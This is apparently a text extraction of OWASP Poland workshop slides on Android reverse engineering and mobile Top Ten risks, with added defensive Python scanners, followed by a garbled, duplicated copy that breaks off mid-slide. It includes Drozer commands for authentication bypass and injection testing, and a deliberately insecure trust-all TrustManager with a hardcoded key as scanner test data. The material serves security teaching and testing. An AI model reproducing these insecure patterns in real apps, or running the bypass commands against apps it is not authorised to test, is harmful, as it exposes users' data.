id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompilers
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
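An added example (not from the slides) of the "analyze package files" step: a Python audit that walks a pulled /data/data/<package> tree and flags world-readable files, secret-looking SharedPreferences keys, and databases that are stored in the clear rather than SQLCipher-encrypted; the app tree it builds for itself is constructed sample data.

```python
"""Audit a pulled Android app data directory for insecure data storage.

Added example, not from the workshop slides: point it at the directory
obtained with `adb pull /data/data/<package>` and it reports world-readable
files, secret-looking keys in shared_prefs XML files, and SQLite databases
stored in the clear (a SQLCipher database does not start with the plain
"SQLite format 3" header, so that check separates the two).
"""
import os
import re
import shutil
import stat
import tempfile
import xml.etree.ElementTree as ET

SQLITE_MAGIC = b"SQLite format 3\x00"
# Heuristic for SharedPreferences key names that should never be stored in plain text.
SENSITIVE_KEY = re.compile(r"pass(word|wd)?|secret|token|session|api[_-]?key", re.I)


def sensitive_pref_keys(xml_path):
    """Return key names in a SharedPreferences XML file that look like secrets."""
    try:
        root = ET.parse(xml_path).getroot()
    except ET.ParseError:
        return []
    return [e.get("name", "") for e in root if SENSITIVE_KEY.search(e.get("name", ""))]


def audit_app_data(root):
    """Walk an app data directory and return sorted (finding, relative_path) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            # MODE_WORLD_READABLE (or a sloppy chmod) shows up as the "other" read bit.
            if os.stat(path).st_mode & stat.S_IROTH:
                findings.append(("world-readable", rel))
            if os.path.basename(dirpath) == "shared_prefs" and name.endswith(".xml"):
                for key in sensitive_pref_keys(path):
                    findings.append(("sensitive-pref:" + key, rel))
            if name.endswith(".db"):
                with open(path, "rb") as fh:
                    if fh.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC:
                        findings.append(("unencrypted-sqlite", rel))
    return sorted(findings)


def build_sample_app_dir():
    """Construct a fake /data/data/<package> tree (sample data, not a real app)."""
    root = tempfile.mkdtemp(prefix="appdata-")
    os.makedirs(os.path.join(root, "shared_prefs"))
    os.makedirs(os.path.join(root, "databases"))
    prefs = os.path.join(root, "shared_prefs", "com.example.app_preferences.xml")
    with open(prefs, "w") as fh:
        fh.write('<?xml version="1.0" encoding="utf-8" standalone="yes" ?>\n'
                 "<map>\n"
                 '  <string name="username">alice</string>\n'
                 '  <string name="password">hunter2</string>\n'
                 '  <string name="auth_token">tok-0123456789</string>\n'
                 "</map>\n")
    os.chmod(prefs, 0o664)  # what MODE_WORLD_READABLE leaves behind
    plain_db = os.path.join(root, "databases", "messages.db")
    with open(plain_db, "wb") as fh:
        fh.write(SQLITE_MAGIC + b"\x00" * 84)  # minimal plain SQLite header
    os.chmod(plain_db, 0o600)
    cipher_db = os.path.join(root, "databases", "vault.db")
    with open(cipher_db, "wb") as fh:
        fh.write(bytes(range(1, 101)))  # SQLCipher-style: first page is ciphertext, no header
    os.chmod(cipher_db, 0o600)
    return root


def cleanup(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    sample = build_sample_app_dir()
    try:
        for finding, path in audit_app_data(sample):
            print(f"{finding:28} {path}")
    finally:
        cleanup(sample)
```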
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or does it incorrectly
What do you mean „incorrectly”?
• Insecure implementations are:
  – Using known weak ciphers/versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of a certificate is on the side of the browser
• It is done by a „chain of trust”
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/framework puts sensitive information in an insecure location on the device
• Important note: insecure data storage talks about a developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
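The logcat check above, as an added example that is not from the slides: a Python scanner over constructed `adb logcat` lines (brief format) that flags e-mail addresses, bearer tokens, passwords, GPS fixes and card numbers, optionally restricted to the app's PID.

```python
"""Scan logcat output for sensitive data that an app should never log.

Added example, not from the workshop slides. Feed it lines captured with
`adb logcat` (brief format, e.g. "D/Tag( 1234): message"), optionally
restricted to the app's PID; the log lines below are constructed.
"""
import re

# Brief logcat format: <level>/<tag>(<pid>): <message>
LOGCAT_LINE = re.compile(r"^(?P<level>[VDIWEF])/(?P<tag>[^(]+)\(\s*(?P<pid>\d+)\):\s?(?P<msg>.*)$")

# Heuristic patterns for data that belongs in neither logs nor crash reports.
LEAK_PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "bearer-token": re.compile(r"Bearer\s+[A-Za-z0-9._-]{16,}"),
    "password": re.compile(r"pass(?:word|wd)?\s*[=:]\s*\S+", re.I),
    "gps-fix": re.compile(r"-?\d{1,2}\.\d{3,},\s*-?\d{1,3}\.\d{3,}"),
    "card-number": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

# Constructed sample: one app (pid 2314) plus an unrelated system line.
SAMPLE_LOGCAT = """\
D/LoginActivity( 2314): POST /login user=alice@example.com password=hunter2
I/ActivityManager(  812): Displayed com.example.app/.MainActivity: +420ms
D/ApiClient( 2314): Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.c2lnbmF0dXJlLWJ5dGVz
V/LocationHelper( 2314): last fix 51.1079, 17.0385
D/Checkout( 2314): charging card 4111 1111 1111 1111 exp 12/27
W/System.err( 2314): java.io.IOException: timeout
"""


def scan_logcat(lines, pid=None):
    """Return (line_number, tag, leak_kind) for every suspicious log line.

    pid restricts the scan to one process, the way `adb logcat --pid` would.
    """
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOGCAT_LINE.match(line.rstrip("\n"))
        if not match or (pid is not None and match.group("pid") != str(pid)):
            continue
        tag, message = match.group("tag").strip(), match.group("msg")
        for kind, pattern in LEAK_PATTERNS.items():
            if pattern.search(message):
                findings.append((number, tag, kind))
    return findings


if __name__ == "__main__":
    for number, tag, kind in scan_logcat(SAMPLE_LOGCAT.splitlines(), pid=2314):
        print(f"line {number}: {tag} leaks {kind}")
```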
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
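One way to do the "decompile and look for" steps of this section and of M3 (trust-all certificates, accept-all hostnames, legacy SSL versions) in a single pass, as an added example that is not from the slides and is neither Mallodroid nor QARK: a Python scanner over decompiled Java, run here on a constructed vulnerable class and on its fixed counterpart.

```python
"""Grep decompiled Java (dex2jar + JD-GUI/Luyten output) for the M3 and M6
patterns the slides describe: trust-all TrustManagers and accept-all
HostnameVerifiers, legacy SSL versions, hardcoded key material and weak
cipher/digest choices.

Added example, not from the workshop slides and not Mallodroid or QARK;
the decompiled snippets it scans are constructed.
"""
import re

# (rule id, regex) pairs; each hit is reported with its 1-based line number.
RULES = [
    ("M3 trust-all TrustManager",
     re.compile(r"checkServerTrusted\s*\([^)]*\)\s*(?:throws[^{]*)?\{\s*\}")),
    ("M3 accept-all HostnameVerifier",
     re.compile(r"verify\s*\(\s*String\s+\w+\s*,\s*SSLSession\s+\w+\s*\)\s*\{\s*return\s+true\s*;\s*\}")),
    ("M3 ALLOW_ALL_HOSTNAME_VERIFIER", re.compile(r"\bALLOW_ALL_HOSTNAME_VERIFIER\b")),
    ("M3 legacy SSL version", re.compile(r'"SSLv[23]"')),
    ("M6 hardcoded key material",
     re.compile(r'SecretKeySpec\s*\(\s*"[^"]*"\s*\.getBytes\(')),
    ("M6 weak cipher",
     re.compile(r'Cipher\.getInstance\s*\(\s*"(?:DES|RC4|ARCFOUR|AES/ECB)[^"]*"|Cipher\.getInstance\s*\(\s*"AES"')),
    ("M6 weak digest", re.compile(r'MessageDigest\.getInstance\s*\(\s*"(?:MD[245]|SHA-?1)"')),
]


def scan_source(source):
    """Return sorted (line, rule_id) findings for one decompiled Java file."""
    findings = []
    for rule_id, pattern in RULES:
        for match in pattern.finditer(source):
            line = source.count("\n", 0, match.start()) + 1
            findings.append((line, rule_id))
    return sorted(findings)


# Constructed JD-GUI-style output of a badly written client class.
VULNERABLE_SOURCE = """\
public final class NetClient {
  static final TrustManager[] TRUST_ALL = { new X509TrustManager() {
    public void checkClientTrusted(X509Certificate[] chain, String authType) {}
    public void checkServerTrusted(X509Certificate[] chain, String authType) {}
    public X509Certificate[] getAcceptedIssuers() { return null; }
  } };
  static final HostnameVerifier ANY_HOST = new HostnameVerifier() {
    public boolean verify(String hostname, SSLSession session) { return true; }
  };
  static byte[] openDb(byte[] blob) throws Exception {
    SecretKeySpec key = new SecretKeySpec("s3cr3tdbpassw0rd".getBytes(), "AES");
    Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
    c.init(Cipher.DECRYPT_MODE, key);
    return c.doFinal(blob);
  }
  static byte[] fingerprint(byte[] data) throws Exception {
    return MessageDigest.getInstance("MD5").digest(data);
  }
}
"""

# The same class after the slides' mitigations: platform trust store kept,
# password-derived key instead of a hardcoded one, authenticated cipher, SHA-256.
FIXED_SOURCE = """\
public final class NetClient {
  static byte[] openDb(byte[] blob, char[] password, byte[] salt) throws Exception {
    SecretKeyFactory f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
    byte[] raw = f.generateSecret(new PBEKeySpec(password, salt, 100000, 256)).getEncoded();
    Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
    c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(raw, "AES"), new GCMParameterSpec(128, blob, 0, 12));
    return c.doFinal(blob, 12, blob.length - 12);
  }
  static byte[] fingerprint(byte[] data) throws Exception {
    return MessageDigest.getInstance("SHA-256").digest(data);
  }
}
"""

if __name__ == "__main__":
    for line, rule_id in scan_source(VULNERABLE_SOURCE):
        print(f"line {line:2}: {rule_id}")
    print("fixed version findings:", scan_source(FIXED_SOURCE))
```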
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – Shared file
  – Server response
  – Third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:
  Intent view = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent capture = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm” prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false”, another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that „sessions have to expire”…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
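The mitigations above, as an added example that is not from the slides: a server-side session store in Python that issues CSPRNG tokens, expires idle sessions, destroys tokens on logout or on a user switch, and takes an injectable clock (an assumption of this example) so the slides' 30-minute check can be exercised without waiting.

```python
"""Server-side session registry illustrating the M9 mitigations: random
high-entropy tokens, server-side invalidation, idle expiry, and a fresh token
whenever the authentication state changes.

Added example, not from the workshop slides; the clock is injectable so the
30-minute expiry check from the slides can be exercised without waiting.
"""
import secrets
import time

IDLE_TIMEOUT_SECONDS = 30 * 60


class SessionStore:
    def __init__(self, clock=time.time, idle_timeout=IDLE_TIMEOUT_SECONDS):
        self._clock = clock
        self._idle_timeout = idle_timeout
        self._sessions = {}  # token -> {"user": ..., "last_seen": ...}

    def create(self, user):
        # 32 bytes from the OS CSPRNG: nothing derivable from a device ID,
        # IMEI or timestamp, so another user's session cannot be guessed.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "last_seen": self._clock()}
        return token

    def validate(self, token):
        """Return the user bound to token, or None if unknown or expired."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last_seen"] > self._idle_timeout:
            del self._sessions[token]  # expired tokens are destroyed, not left around
            return None
        entry["last_seen"] = now
        return entry["user"]

    def invalidate(self, token):
        """Logout: the server forgets the token, so a copied cookie stops working."""
        self._sessions.pop(token, None)

    def invalidate_user(self, user):
        """Password change or logout-everywhere: drop every session of a user."""
        for token in [t for t, e in self._sessions.items() if e["user"] == user]:
            del self._sessions[token]

    def switch_user(self, old_token, new_user):
        """Authentication state changed: the old session dies, a new token is issued."""
        self.invalidate(old_token)
        return self.create(new_user)


def demo():
    """Replays the slides' test: reuse a cookie after more than 30 minutes."""
    clock = [1_000.0]
    store = SessionStore(clock=lambda: clock[0])
    token = store.create("alice")
    first = store.validate(token)   # "alice"
    clock[0] += 31 * 60             # the copied cookie is tried 31 minutes later
    second = store.validate(token)  # None: idle timeout hit, token destroyed
    return first, second


if __name__ == "__main__":
    print(demo())
```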
Thank you
pawelrzepa@outlook.com
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
